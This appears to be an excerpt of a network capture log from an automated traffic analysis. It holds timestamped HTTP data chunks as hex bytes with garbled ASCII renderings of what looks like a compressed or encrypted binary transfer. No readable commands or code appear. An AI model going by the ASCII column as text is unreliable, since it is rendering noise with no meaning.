                                                                                                                                                    2022-09-29 12:58:58 UTC1387INData Raw: e7 87 3e d5 3b 5f de 41 c5 d4 bf c7 cd ce c5 b8 3f de 73 d3 a9 e6 6f 89 24 fa 27 71 bc ee 12 ac ff f8 0d 52 eb c4 e4 81 70 a7 1e d3 5c 2b 85 c9 a9 84 17 37 39 e9 b6 7b 9e 43 bc 3e 4c f6 13 03 b7 af af f0 68 5b 22 34 9a 20 a2 ff 2b 16 45 65 d5 e2 8d 94 0f 45 02 19 3d ed 11 54 91 80 af 37 74 47 42 36 d4 4b f8 16 58 46 b2 6e 89 e5 59 94 da e9 58 3e 8e e2 c6 03 a1 5b 27 58 11 5c 3e 8a bb 22 67 9d 9f 03 42 22 54 36 72 5c 3a 82 c1 10 22 6f ed d4 c5 cb ba fa 39 f4 c9 2e 59 99 48 8e 97 0a 5c a4 93 d1 41 04 24 b9 1d 04 eb 3a e1 f1 98 fc 8c 48 8a 8a 73 57 e8 76 99 ed 9d 0f ef 60 16 9e a3 35 65 89 13 08 df 20 7e 23 c2 36 39 19 7f d2 e8 33 6c 26 23 fe 09 50 0b 33 ae f1 37 b2 5a 9d 47 c1 c6 2a b9 3b 54 2a 64 55 31 1b f1 4c 0c 00 0f ea 2f 9b 46 f9 99 5e 56 70 e3 da 8a
                                                                                                                                                    Data Ascii: >;_A?so$'qRp\+79{C>Lh["4 +EeE=T7tGB6KXFnYX>['X\>"gB"T6r\:"o9.YH\A$:HsWv`5e ~#693l&#P37ZG*;T*dU1L/F^Vp
                                                                                                                                                    2022-09-29 12:58:58 UTC1387INData Raw: 26 e7 c2 81 32 b2 96 c1 5c 83 32 f9 d3 13 1c 80 e6 13 32 59 ee d1 31 dd 01 2a 0a f0 74 ae 04 70 cb 2d 41 a8 19 ef c8 00 02 a4 cd 09 9c 78 47 bb 30 f1 91 ca 02 56 16 f7 58 19 7f 78 f1 17 28 14 18 83 e3 04 63 38 aa 6e 67 cd 26 2f b5 b8 84 78 8f 9a c7 ac 62 ce fe 8f aa 51 b2 3e f5 03 d0 e3 28 a5 f9 e1 94 94 33 d6 76 e1 80 ce 2d 90 a1 d9 bc 14 b1 00 56 6b 48 61 1c 32 7f 90 41 a7 ec bd 68 ec bf c5 6c fc 8b 61 c8 7f 7b 52 05 fd 34 a0 30 90 ed 54 29 32 d6 0f 1f 35 94 3e 77 0e 90 3f c4 d7 78 22 7a ba 72 a3 01 fe b3 9b b0 57 9e 25 1b 20 fd de 71 e2 ae 55 c3 f6 76 25 08 c4 a0 5d 9f bb eb e7 53 e8 95 dc 2a 0f 46 48 7a 68 82 6b 96 eb 8b a0 10 17 3b 16 85 21 14 58 55 49 93 9a 50 b3 e8 23 6b ec fb d6 df 17 aa 12 8b 07 89 68 fb 43 4f b7 77 80 75 e2 c4 2f 07 50 f6 a2 9b
                                                                                                                                                    Data Ascii: &2\22Y1*tp-AxG0VXx(c8ng&/xbQ>(3v-VkHa2Ahla{R40T)25>w?x"zrW% qUv%]S*FHzhk;!XUIP#khCOwu/P
                                                                                                                                                    2022-09-29 12:58:58 UTC1403INData Raw: c3 69 ce 87 7e b8 fb 2e f3 71 e1 cc 72 52 53 a0 4f 69 ea c6 49 1f de 61 48 43 fa ea 6b ca 93 c9 cc c0 d4 4c ed cf d5 40 cc 8a 5e 9c 2a 87 3f 20 76 80 01 aa f7 ef c2 57 a5 d1 a5 4f 02 da a1 9c 0c 2a 27 ea 2f 6d fd 11 5e f6 65 51 88 03 06 d2 f1 08 0e f7 a5 6d ae dc 6b d2 5d 8f 06 c2 4f 18 df 31 bd fe 65 08 89 e4 ae 5c c6 c3 83 93 b0 74 4b f3 0b 33 01 4f c6 e5 58 54 f1 c6 22 fe 7e b4 cc 26 fd d4 40 a2 20 ac 31 8c 90 d6 b7 22 69 8a 65 d1 d7 c3 f7 02 62 95 bc 8b 9b 06 ab 4b b1 0d a5 a0 8e 6c 7f 04 78 40 7f 65 3b e3 0c 6b f3 c2 4e 10 5f 91 8f b0 c1 e9 9b 50 b1 a6 1e 57 57 81 89 af ea 0f 2d 0b f5 e7 1f 73 3b 95 fa 70 af fd cd e7 41 ff 1e 02 ae fc 82 9b 92 c7 92 ba 00 54 90 3c 0c b9 1d df f5 48 24 c6 41 fd 2d b4 b2 d8 50 51 a0 04 e5 0c 70 65 5a 44 21 0f 60 e1 b4
                                                                                                                                                    Data Ascii: i~.qrRSOiIaHCkL@^*? vWO*'/m^eQmk]O1e\tK3OXT"~&@ 1"iebKlx@e;kN_PWW-s;pAT<H$A-PQpeZD!`
                                                                                                                                                    2022-09-29 12:58:59 UTC1419INData Raw: a7 eb 23 14 6c 04 46 33 b3 26 f4 19 7f 96 03 c0 17 b3 eb 99 3c 2d 70 92 d9 8c 66 ea 47 1b 34 34 ec 00 b5 9e 98 e6 e7 a5 34 14 de a4 c9 0f a0 ed 92 04 10 77 06 7b 13 2e ed f4 d6 0f e7 f5 f8 bb ab e5 0b 7f 6a 35 95 c6 0c 83 46 8d 38 d9 ea 73 63 31 31 85 b6 0b 43 ca 34 4a 3b 13 3b 54 4a 9c d7 32 5f ee 8f 35 74 7d 14 b0 28 b6 49 5b 84 ca 9a e1 ca 2b ea 05 03 7c 26 3f 6e 31 8e 9f d8 4b 69 68 e3 30 ad e7 c5 fd c1 85 15 d0 35 82 11 95 17 b6 78 3a 97 50 c6 72 73 11 7c e6 61 aa 1d 9a 8d 58 05 46 35 e0 69 60 41 21 5d e2 cc f3 15 b2 4e 87 6f 65 13 90 3e 6e c6 73 36 84 0c d3 3e 1c c2 79 24 96 b1 14 c9 50 20 97 3c d1 3d fb 96 fe da cf 8d 39 e8 5c 04 79 ac 97 fc 0f 2c 0d a0 d2 d2 93 c3 c5 e2 fe 92 d2 54 2d fe 31 4d d7 35 4a 6e d1 17 d4 ca 34 8b f5 51 b4 be 66 7a c6 e5
                                                                                                                                                    Data Ascii: #lF3&<-pfG444w{.j5F8sc11C4J;;TJ2_5t}(I[+|&?n1Kih05x:Prs|aXF5i`A!]Noe>ns6>y$P <=9\y,T-1M5Jn4Qfz
                                                                                                                                                    2022-09-29 12:58:59 UTC1435INData Raw: 49 df 64 a2 fe 37 9f 15 cb 44 dd f4 9d 67 88 6c c8 d2 c4 c1 17 43 93 ed 1f 16 77 3f dd 94 22 0e 56 18 fa 21 c8 dd ee 56 97 a7 92 d0 6d 43 4c 28 06 23 af 29 a8 51 36 ff 92 0f fe fd 3a 0a 3d f8 b8 3d b8 63 33 06 7e aa 85 6f 0b c3 5b 69 71 0f 28 78 f7 3d 28 c7 94 2a 63 81 59 4b 99 31 9d 3e 9e ef 56 0b 10 71 c4 b0 96 f3 36 97 a5 c5 4a 75 22 e4 da b3 14 c3 fc 90 cd 96 6b 09 b1 ec 42 da a4 0d d8 91 33 93 55 59 60 4d 82 06 6e 51 00 f0 f4 b5 6f 2f 2f a5 52 84 d7 76 7a d4 60 07 1d 6b 3a 0b 9a f1 53 5f 5e 15 ee 9e 60 bd ec 21 3e c7 ed b6 c8 5b 40 a9 4f 97 47 94 66 4b 57 1c a6 96 b3 41 2e d3 f3 b8 48 77 4c 46 a2 39 af 81 85 db 58 d2 89 52 9d b3 a5 3e f7 6a df ed 72 8e 75 99 14 2e 7b 09 df cc d6 17 75 97 63 88 50 27 37 b1 c1 f3 20 6d e6 bb e4 b0 5d b1 4f 0f c8 94 13
                                                                                                                                                    Data Ascii: Id7DglCw?"V!VmCL(#)Q6:==c3~o[iq(x=(*cYK1>Vq6Ju"kB3UY`MnQo//Rvz`k:S_^`!>[@OGfKWA.HwLF9XR>jru.{ucP'7 m]O
                                                                                                                                                    2022-09-29 12:58:59 UTC1451INData Raw: 3d 12 44 63 89 68 92 40 e3 e7 c4 b5 5a f5 fc 7e 03 fc 4f 73 28 eb 43 0c e8 6e d8 aa fb b9 62 ae e9 cc 14 b0 d6 c7 25 c9 13 aa eb 77 5e cc c4 78 72 5f 39 f9 4d e4 03 57 37 05 2d d3 a6 6e cb 64 cf fa da 5c f2 5e 98 49 84 cc 85 f8 cc 4d 00 e8 96 b2 7d 28 df ed 00 22 4c a2 31 e4 1c 39 15 0e 34 65 41 21 57 05 6b 19 c9 32 36 c1 3e f5 22 8b b8 4c 9c 9c dc 20 65 14 6f 8a 27 63 67 79 25 e1 4a f8 ef 1d b3 15 85 bf 5c ed 56 83 da 45 4a df f4 5a 17 9c 47 ad 4e 6c 0e 17 e6 47 60 13 5e 8a 0f 13 b9 b0 42 7b 9f 05 6a 38 53 d5 c3 99 60 34 bb 19 35 4b 7c 11 8b a9 70 4a 13 e8 ec 75 49 8c 2a c7 6b 38 33 c1 b7 e7 b7 a3 64 f8 00 c7 4f b6 d6 08 f8 ef fd 2f a9 11 64 02 b6 39 60 fc 95 7a 07 c2 c3 fe e7 1a b1 bc 86 9a ed 34 aa aa e0 ae ba 68 2c 51 83 9f e1 20 dc 6e b9 fa 8c ab b5
                                                                                                                                                    Data Ascii: =Dch@Z~Os(Cnb%w^xr_9MW7-nd\^IM}("L194eA!Wk26>"L eo'cgy%J\VEJZGNlG`^B{j8S`45K|pJuI*k83dO/d9`z4h,Q n
                                                                                                                                                    2022-09-29 12:58:59 UTC1467INData Raw: e1 18 88 0a d4 00 02 da 63 1f 44 f8 90 a0 f2 12 00 73 4b fe aa ed 09 11 3f 2b e2 a4 cf 43 70 6f 2d ba 08 e3 12 79 cd 65 1d c5 e6 c6 49 a1 0e b1 93 28 bb b2 1a 95 31 d3 cd c8 e8 79 17 d8 13 32 65 d2 37 0f ee 2d c8 92 ca c6 c6 ef ae 66 a7 1b 21 c1 6c 34 84 0a 7b 92 4f 9b 15 80 26 d5 2d 68 7a 72 5e e0 c1 0f f1 95 91 fe be ab 0e 2a 13 48 e8 23 5d 51 ad e7 91 fc 30 47 ca a1 17 4d 25 90 59 0e 51 2c 6a 06 d5 eb a5 aa 77 55 e9 f5 6b 48 4d 97 4d 80 e9 8c a1 be 2b 55 05 6f 2d 60 18 85 e2 1a 1b 98 e0 4b 78 6e 4b 15 bd 91 8b 5e 79 b1 00 ca e3 d4 cd 57 bd 63 81 d3 1f 6a f1 2e de b0 6c 03 1f 39 02 29 b0 c4 3f 56 31 d4 6a 88 98 2b 58 6b ad a7 e0 5e 71 ab ee 52 94 d3 cc cd 73 63 87 c9 d9 ad cb db 8d 6a 5e f6 0c cc 01 0f a5 41 d9 7e 37 fe 6a 36 ae f0 4b 0c 23 3a 5e eb 44
                                                                                                                                                    Data Ascii: cDsK?+Cpo-yeI(1y2e7-f!l4{O&-hzr^*H#]Q0GM%YQ,jwUkHMM+Uo-`KxnK^yWcj.l9)?V1j+Xk^qRscj^A~7j6K#:^D
                                                                                                                                                    2022-09-29 12:58:59 UTC1483INData Raw: 44 80 ff f9 a2 d2 be d8 7f 0a 01 6f 0c 0c 4d 69 7e 3a 92 8c ed 83 5e 58 aa e6 6b 77 ad e9 dd b0 fe c7 2c b4 4b 64 5a 6b a2 84 07 ef e6 ab 7c 34 20 b6 df d1 5a 3e 19 a4 80 0e 64 3b b8 70 ce 58 78 35 38 c0 2b e8 3f 11 fb cd 8b 2c ba b1 7e 61 20 40 7f 74 00 b9 f0 97 e8 c2 ec dd 83 d0 99 70 0f 01 65 aa 50 f4 1a 49 e1 df 71 58 af 46 14 69 07 5d 34 9b a8 b4 8b 94 14 86 97 41 79 60 30 f5 ae ad 7c 6f 07 5f 31 9b d0 ac ca aa 6b c9 29 fd 3f 4b 87 e7 5b 20 c3 42 d3 b1 21 bb ca 28 39 cb da b8 68 b8 35 a8 72 ab 91 f2 bc 25 d5 76 3a 89 0a d8 18 8f 85 df 0a ee 7f c0 47 c2 61 c3 91 c1 13 18 96 8f cb ff dc cf e2 be cf 29 3b 6a 42 90 e0 d9 83 3a 20 93 cb 34 ef 32 07 65 5c be c4 ae f7 9f 42 10 e3 f3 e7 e4 a9 28 f5 47 7f 92 62 aa 63 d2 9f 7a 5a 4b fc aa f6 09 2c 17 1b 16 18
                                                                                                                                                    Data Ascii: DoMi~:^Xkw,KdZk|4 Z>d;pXx58+?,~a @tpePIqXFi]4Ay`0|o_1k)?K[ B!(9h5r%v:Ga);jB: 42e\B(GbczZK,
                                                                                                                                                    2022-09-29 12:58:59 UTC1499INData Raw: 5b 26 42 05 b6 31 83 00 8e 83 a2 23 3a 0f ed d3 77 4a b1 ff d7 48 9f 78 1c f3 96 23 21 23 b6 ae 45 43 a8 2b d1 e1 51 22 85 26 f8 1f e8 a4 29 74 d9 e2 f8 5e 82 5e cb e6 cd ee 00 cb e8 c9 9e 7a 02 77 34 74 bb 79 72 e7 f8 69 2c 47 95 1b b6 dd f1 17 2c 3e 83 8e 2b ac a0 50 a7 ef 02 0b e3 65 1e 1e 76 27 5f 8d 32 e2 1b 1d 01 20 cc 90 e6 7c dd a3 35 ba 8b 9f 67 1d 65 01 fa c5 19 20 c7 63 43 08 c6 8d 6e 0c 28 57 d0 19 8e 59 ea 44 1b d6 82 5b 51 c9 1d b7 b5 49 93 77 6a 4d 47 96 15 a9 6e 14 f1 17 7d 15 02 39 d7 87 fd c7 bc 77 31 0e 93 aa a5 6f 91 1a 66 f4 8f 3c 45 3e 6f 22 d5 80 6f 09 e9 b2 9c 83 70 7e 71 dd 40 5b 52 e1 4c 5d ea dc 4a 41 19 0e 2e e7 03 a9 1c 37 0a 08 71 01 6e 5d 11 4c 68 74 f3 0f da cd fa 7c f2 c7 52 1d 4c 75 dc 9d 4f 5e 11 d0 c0 64 cf 1b 09 76 44
                                                                                                                                                    Data Ascii: [&B1#:wJHx#!#EC+Q"&)t^^zw4tyri,G,>+Pev'_2 |5ge cCn(WYD[QIwjMGn}9w1of<E>o"op~q@[RL]JA.7qn]Lht|RLuO^dvD
                                                                                                                                                    2022-09-29 12:58:59 UTC1515INData Raw: 7b 1f ab 19 aa ef 3e 03 71 87 df 70 8e 5e 8a 13 66 ea 8e 5e 06 37 a7 f3 9d aa fb df 24 79 33 4b 45 2e 00 07 83 57 21 43 37 9c e9 3f 4b 70 92 84 41 de b0 88 86 1b 23 b0 a3 c1 0b c9 3f 7d 89 d5 17 34 d9 b6 72 c3 44 10 f1 96 c8 62 ef dd d2 57 5c 0d a4 eb 0c 3f d8 f8 32 da ba da f0 b7 43 df 79 40 da 00 82 ec cb 57 6c 70 6c 5c ed 0e 4f 05 1a fd d8 6b 94 58 73 8b 53 f1 35 0c 80 d1 11 7c b8 29 dd a9 0d 8f 13 9c 9c 38 dd c6 ce 74 12 ca aa a1 c4 4f ef 00 22 6d a6 f4 87 3e ee 18 c7 2c 44 2d d2 e1 8f d1 0c 5c e3 c0 1d d1 23 84 10 98 9f a3 ea ec c3 ad ee fa 58 02 5c 19 67 02 1d c2 62 34 1a c4 89 cb f1 3b f9 5e 7a 2d 5f c2 bb 32 a6 56 e7 2f ac a1 27 5c f1 f6 d0 c1 6b ce 47 39 4d dc e2 1e 68 32 1d 8a 3b f9 4e b6 e3 fe e1 04 e6 e2 bf 39 4b 82 52 c1 a7 40 e7 c1 53 6c 46
                                                                                                                                                    Data Ascii: {>qp^f^7$y3KE.W!C7?KpA#?}4rDbW\?2Cy@Wlpl\OkXsS5|)8tO"m>,D-\#X\gb4;^z-_2V/'\kG9Mh2;N9KR@SlF
                                                                                                                                                    2022-09-29 12:58:59 UTC1531INData Raw: d0 89 bf 98 8c f7 e9 d1 db e3 e1 f7 13 e0 93 9d c6 cd b2 f7 7c 20 c6 33 d1 34 40 53 51 99 dd b4 e4 60 87 39 88 dc 4e cd e8 ec de ed 89 8d 16 40 d3 86 86 b1 54 0d 0f c2 a2 f7 bb 37 0c 36 9a 3d 0b 01 22 ee e8 0f 45 e5 64 a0 98 16 fa bb d1 0b 08 86 5c b7 d9 33 df f5 4c 41 ff 7a 6d 12 a5 05 8b 6c 03 7d c5 2e 2e 01 16 be 30 97 2a 0c 7f bc e8 dc d6 77 c7 ee 0f bc f6 11 86 ca 89 d6 e5 ba c3 a7 f0 ae c8 ed 0d 4f 8a 4e f9 bb 8c 7d a7 f4 cf 24 b1 da c7 22 d2 bf d5 56 66 7b fd 51 18 6f 38 b0 f8 dc a1 8a 14 50 c4 d9 3b f6 4b 7d 30 ab 4a 11 1a c0 d6 bd 42 5a 6f ce 76 6c ed b4 a4 05 0d fa b1 e5 14 e6 a8 4a 5e f7 d0 83 06 af 65 7d de c8 fb 06 f4 d9 6e 84 62 d7 57 b0 29 0d ba 3c da 66 b0 bb 28 b0 f9 a7 ca 61 69 74 2e 59 10 cf a8 7a 09 f4 7b 2c ba 8e 7a 89 e7 0c 57 cc ac
                                                                                                                                                    Data Ascii: | 34@SQ`9N@T76="Ed\3LAzml}..0*wON}$"Vf{Qo8P;K}0JBZovlJ^e}nbW)<f(ait.Yz{,zW
                                                                                                                                                    2022-09-29 12:58:59 UTC1547INData Raw: cc 81 b4 9b 43 db 9e 63 59 e1 33 42 3e 65 81 6b 45 42 67 ff 6b 64 aa b8 67 a3 d2 ec 9d 01 14 64 98 60 f5 58 80 fa c1 2d d5 a1 d5 46 fa cb 03 8e 17 41 03 73 7c 06 2b d8 9f d5 86 f1 43 6d 90 f2 e7 39 1f af 25 9d de 88 5a 8c 89 83 3e 18 da 2d 99 69 3c b5 ea 70 de 8f 67 a1 b4 bd 05 c9 ff 2a 1c 45 eb 9c dd 8d 00 6e 52 5c cb 18 16 d5 78 dc c2 a4 4d c1 a2 3c 9a 0e 09 9a a8 c7 51 4c e3 0a 7f 6e cf 5c 46 13 55 5d d8 6b 0c e6 ec a7 ab 6b 72 7a a8 62 67 da 19 7b 79 20 e0 e6 00 1d a3 a7 88 02 67 78 bd eb ea 36 fe 57 e6 d9 bc f2 37 31 8c b1 00 4f 25 01 4a ea 28 91 3c 8b e7 09 c4 f4 84 34 60 0f 47 87 60 10 a0 b8 f3 dd 40 e7 ab 45 dc cc c0 f1 6f 2b af f4 3f 7c 69 21 48 5a 4b 6a 5b dd 88 75 59 2b e1 ce ef ae 34 51 74 1e 84 af 17 1e f8 70 13 ba bc a7 2a 2c 60 4a d7 7f 0d
                                                                                                                                                    Data Ascii: CcY3B>ekEBgkdgd`X-FAs|+Cm9%Z>-i<pg*EnR\xM<QLn\FU]kkrzbg{y gx6W71O%J(<4`G`@Eo+?|i!HZKj[uY+4Qtp*,`J
                                                                                                                                                    2022-09-29 12:58:59 UTC1563INData Raw: 13 f6 81 64 c6 48 2e d7 97 72 a9 c5 f4 28 9f 52 29 10 c1 77 86 98 1b 6a 54 eb 36 0d a0 58 96 d5 f1 d1 63 db fa bc 60 f7 8c b8 ba 68 b4 a0 63 e8 74 81 bb e5 a2 2c e9 ee 45 25 df 16 b2 c0 b2 58 4f 78 ae 05 92 a5 32 f3 bf 77 18 5d 9a e3 b9 0f fc 67 c8 a6 85 80 4d ae 66 7e 06 80 9d ce 27 7b 96 06 04 da 52 99 67 2f be 42 0f 97 1a 01 eb 58 a6 ba af c4 8f 88 51 a1 27 98 f7 8f 25 2f 95 01 64 df 3b 4e ca 66 85 85 ff e6 ca d2 20 d7 00 80 0b 9e fc de da 2a ca 17 87 f0 ac ab f3 66 55 c1 1e 79 dd 7c be 9b 1a 3b 36 f9 f9 c6 46 df 29 fc 47 43 b6 85 2b 49 86 79 9e 11 c8 c3 4e 26 47 a8 73 9d 2b 6a ed 70 fc 16 d0 5d 2f fc 7e b3 82 e2 2a a3 0f 15 7a 8f 19 5d db 74 55 29 b5 1e f0 7b c4 7a 09 8b 80 f3 ef ca fd 02 6d 3d 97 f7 bb 19 a6 64 74 f6 15 f2 9e 77 a0 eb d5 c1 03 bf 72
                                                                                                                                                    Data Ascii: dH.r(R)wjT6Xc`hct,E%XOx2w]gMf~'{Rg/BXQ'%/d;Nf *fUy|;6F)GC+IyN&Gs+jp]/~*z]tU){zm=dtwr
                                                                                                                                                    2022-09-29 12:58:59 UTC1579INData Raw: 71 fc d1 6a 31 03 fd 51 54 99 77 1b 87 0b 76 ba 23 ea ce 14 43 5b 0c 47 ff bb 5e c5 c4 20 1f 46 e5 29 7e fa a1 1b 76 7f bf 8f b7 c9 54 b5 9e f7 ea 74 81 3b e0 00 3f 29 5b 06 f5 8f c6 12 50 46 93 88 4e a9 06 db 0b 22 82 0c 78 6f a5 1e e6 fe 37 a0 77 a7 d2 ad 42 5a 85 4d 42 a6 aa 0d 43 26 ea e5 93 e2 8c 48 58 56 af be f8 7c af 87 66 c8 66 ec c9 1f b0 ac 48 c4 ef b7 38 41 ba 18 43 ff 0b 42 34 2b 96 5a 13 33 78 7e 17 4e 55 a2 7b d8 17 b6 e2 4a 4e cf 40 1e 35 96 6c 75 ca 6d ae 64 fe 75 5e 37 c6 c9 ac d0 74 a8 5e a7 3b 66 d3 ad d3 0e 3b 11 11 1d 6e 7a 0b bd 03 57 2b a4 20 ee ba 0a c1 ff f2 4e 97 d5 52 35 80 12 15 82 4e 3b 75 8e 4c 3b c3 98 1f 76 03 ef 55 42 a9 b3 d2 62 d7 b0 74 2a 2e fd 48 25 c3 ef 62 eb e7 c8 82 f7 1f ed 75 17 0f d3 ea 88 b6 93 ff 23 60 53 f5
                                                                                                                                                    Data Ascii: qj1QTwv#C[G^ F)~vTt;?)[PFN"xo7wBZMBC&HXV|ffH8ACB4+Z3x~NU{JN@5lumdu^7t^;f;nzW+ NR5N;uL;vUBbt*.H%bu#`S
                                                                                                                                                    2022-09-29 12:58:59 UTC1595INData Raw: f7 c1 fc 94 d6 b7 25 80 dd 8c 3d 40 a9 74 93 d3 6b a3 aa 1a 93 62 13 f8 2d 69 6e a5 ff 60 2b a9 38 9d 90 25 0d 2e ab ca f0 30 7a 5a 3a a9 89 df 40 46 88 39 55 21 4e e7 d3 f3 26 26 2c ff d3 3b 55 37 ef 2b 7f ac e9 5d d3 7d 5b f4 77 54 1f 18 0b 75 13 fd 92 e5 da 25 81 9a 21 8c d6 4f b3 1a bb 65 72 79 e5 6f d7 a7 73 10 5f 2f 0c 17 37 9b d7 7d 6c c2 db f1 6f 7f 94 99 c3 a7 20 eb a1 73 d8 95 d0 b0 7e 57 c0 52 00 2f 16 c4 1b 32 06 1f a0 c9 3b 0e 9d 77 0f cd ae 0c 43 cb 35 b7 19 24 b5 1f 4a bb 0b 84 b6 b5 0c a3 bb a1 15 a1 43 ff f2 05 29 3b ef 7c 33 a5 82 1f d3 a9 ac 36 12 d9 bd c9 44 47 68 d6 84 99 a1 99 f9 5a d4 17 62 ab 80 27 84 bc 6e d8 0a 82 ce f5 1c 0a 6b e1 32 ca 09 81 f9 fe 94 a4 25 cd 01 49 41 96 90 88 51 22 bc 4c af ac 84 54 f1 c0 23 f7 93 76 ae c3 5c
                                                                                                                                                    Data Ascii: %=@tkb-in`+8%.0zZ:@F9U!N&&,;U7+]}[wTu%!Oeryos_/7}lo s~WR/2;wC5$JC);|36DGhZb'nk2%IAQ"LT#v\
                                                                                                                                                    2022-09-29 12:58:59 UTC1611INData Raw: 06 4c f5 e5 1c 64 f3 82 27 c0 6e ea 89 72 ee 2e 6b 41 75 ed 38 ba fc e8 fa 78 fe da d1 44 eb 1e 98 50 5c 27 ce f4 88 55 6e 68 28 01 65 d1 ce c8 82 57 86 fa bc 3b a5 52 d7 2d a1 46 62 dd 45 6a 1a 96 07 ec c3 47 fb 27 79 7a 43 3a 01 ea a5 88 70 db 24 97 bf f0 ea e9 33 f1 bb 9c a3 01 ee 5d d9 6b 27 e7 74 f4 f0 00 4e dd de eb 2b 70 09 4f ca 4b fd 30 14 2a 47 50 5d 78 dc b5 36 b1 db c3 6e 03 42 f2 95 93 fa d2 d0 b5 16 54 80 83 c1 40 eb 8a f8 31 31 8c b1 60 42 37 2a b5 60 14 e7 ef ea 14 3f 26 b0 a4 87 8f 74 9c 5a d0 cb 2a 44 fb b6 aa 5a 9a 3f b1 c1 37 db b0 0d 2a 49 42 55 fb 06 a8 cf 37 4b e2 73 cf 6b c9 dc b2 a7 77 69 ee d6 31 9a 4a c4 e0 58 8c d6 d4 73 a5 c5 2e 8b 48 8b 62 ff b8 15 50 11 7e 2c 50 8a 06 61 06 17 7b d9 50 6c df 3f 59 70 de c9 48 c7 8f 48 44 b1
                                                                                                                                                    Data Ascii: Ld'nr.kAu8xDP\'Unh(eW;R-FbEjG'yzC:p$3]k'tN+pOK0*GP]x6nBT@11`B7*`?&tZ*DZ?7*IBU7Kskwi1JXs.HbP~,Pa{Pl?YpHHD
                                                                                                                                                    2022-09-29 12:58:59 UTC1627INData Raw: cb 1b b9 92 36 01 ea d0 20 83 28 5a 2c 07 0b b5 dc e0 0c 1c 5b 0e 43 02 5e fc 8b ee 47 48 6b 4c 13 8e 75 df 17 f4 46 08 c6 fa 35 a9 dc 14 57 a0 6f 0b 70 70 1c 0d fa 6f f5 1a f3 c7 2e 95 0c d8 26 ed e4 74 e5 3b ed 58 0a 68 d9 5c 51 41 88 9a b2 5c 47 b4 9b de 53 d6 7b 59 90 08 0e 41 14 1e 6a 51 b8 f3 d4 71 f2 0e 82 de ed 25 af 96 ad 8b 2d 8f 2b 5d 28 2b 44 e7 e5 e1 8e 7c b5 b2 76 4c 75 98 24 0a d3 b1 95 bf d6 9f ad 2c af 8d bb f3 e8 5a d3 36 6b d0 30 f1 ab 94 5f 03 ec 06 50 d5 c5 16 4c b0 c2 80 60 62 93 b5 b9 3a c7 91 e2 96 99 6b 7e 05 74 cc 74 78 ed 17 4f 96 29 9c 09 ea bf 37 33 6a 48 5b a9 f5 0e 92 d0 47 62 73 2f 22 26 b1 cd 55 94 f4 b9 90 c8 86 67 07 4d cd aa e7 b3 a0 78 c7 70 02 dc b9 ee 33 a7 3d 05 6c ce 6e 55 f0 a5 5c 8d 6d 07 26 b6 86 2b 3b 8c 90 f4
                                                                                                                                                    Data Ascii: 6 (Z,[C^GHkLuF5Woppo.&t;Xh\QA\GS{YAjQq%-+](+D|vLu$,Z6k0_PL`b:k~ttxO)73jH[Gbs/"&UgMxp3=lnU\m&+;
                                                                                                                                                    2022-09-29 12:58:59 UTC1643INData Raw: d2 c6 19 0a 60 a9 fb ad 6f d1 95 73 cb d0 df 53 b8 dc 9a 3f ab 90 7f cd 93 1b da e7 44 06 25 ee 78 d4 19 05 bb 67 a7 a8 79 42 89 6e 50 0a 74 27 4e ed 2a 73 64 ec 32 29 4a c4 f4 aa 86 c5 4f 1a 13 a4 f4 fa b4 87 10 0a ac be 3c 62 0b 1b 7e 59 86 65 aa ba 09 bb 41 73 c8 ed c4 87 81 59 37 67 27 66 bd b7 a8 e8 67 ee 5a 98 36 94 de f1 33 fb 58 3b f6 5e ef c2 0a 9c 0a e3 ee 24 eb 6b ad c3 a5 2f 63 da 75 e1 e0 92 15 61 76 a4 5e 55 21 75 eb 6c f7 f5 43 ca d6 37 7e 95 fe 5a 7d 48 5b 7f b6 05 18 e9 79 ff a7 3b 0f 4f 85 21 8b 59 20 1b 24 22 2c c3 df 11 33 bb 46 c4 c0 8d 03 67 34 34 be a4 3a a6 a9 9f 2e f2 24 45 ca 9a f5 fa 80 cc 16 2e e3 7b 44 56 0a f2 00 bd cb c7 8a 85 a5 dc f0 bd 3b 61 ef ac fb 66 73 26 a2 a4 56 71 94 1e f4 73 09 ab 6b 74 20 3c fd d9 1e f3 fc 1f 1c
                                                                                                                                                    Data Ascii: `osS?D%xgyBnPt'N*sd2)JO<b~YeAsY7g'fgZ63X;^$k/cuav^U!ulC7~Z}H[y;O!Y $",3Fg44:.$E.{DV;afs&Vqskt <
                                                                                                                                                    2022-09-29 12:58:59 UTC1659INData Raw: d5 1a 09 8e fc 2a 6a 33 fd 77 ba 31 86 2a d6 c5 49 44 f9 32 25 3a e6 25 6f 12 a3 ca 08 98 df 83 1b c9 f9 02 34 b2 f8 c6 d4 27 28 59 9c ca 06 7f e6 94 1b 33 89 d6 7f a9 db 86 78 01 12 67 50 c4 62 84 04 73 33 c7 80 55 a8 0b a3 59 a6 34 3b 0a 35 2c 4a 36 ce 00 b7 84 b1 c4 2c 77 72 d7 14 20 25 7a 6f af 07 8d b7 df 7a 89 29 1e aa ed 37 bc b2 53 a2 c3 35 08 59 88 ee f7 21 8e 7f fa 3a 54 ab 8a ca c3 12 8d 9b ed 8b dc 66 59 55 07 42 c1 78 aa 9f ee f6 d6 9c 7a f6 76 3d bf 39 bd 8a 61 fe 2e 02 04 4e 97 13 17 66 ba e4 1d c7 f9 59 16 57 b7 69 67 f4 e7 59 96 c6 8d d4 cb 02 11 c0 22 5e bb 47 24 82 66 10 32 a0 f2 1a 1f db 2d f7 2d d5 66 87 08 69 eb 4b 01 0a 5e 20 22 d4 04 23 b8 ca cd 6c b3 f8 6f 09 46 82 41 b8 eb 29 b5 9c 83 b6 1e 32 3a c0 5f b4 cb 4d 27 1e a8 03 73 22
                                                                                                                                                    Data Ascii: *j3w1*ID2%:%o4'(Y3xgPbs3UY4;5,J6,wr %zoz)7S5Y!:TfYUBxzv=9a.NfYWigY"^G$f2--fiK^ "#loFA)2:_M's"
